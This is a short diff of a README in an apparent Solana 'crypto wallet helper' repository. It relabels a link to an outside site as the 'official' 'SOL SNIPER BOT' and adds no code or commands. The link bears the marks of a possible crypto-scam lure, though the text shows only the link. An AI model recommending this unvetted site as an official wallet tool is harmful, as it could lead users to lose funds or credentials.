juhusorlando1/-solana-crypto-wallet-helper/README.md

 Get Started

-[https://airpump.top] – access the official bot or documentation.
+[SOL SNIPER BOT](https://airpump.top) – access the official bot or documentation.

 Follow the setup instructions in the README.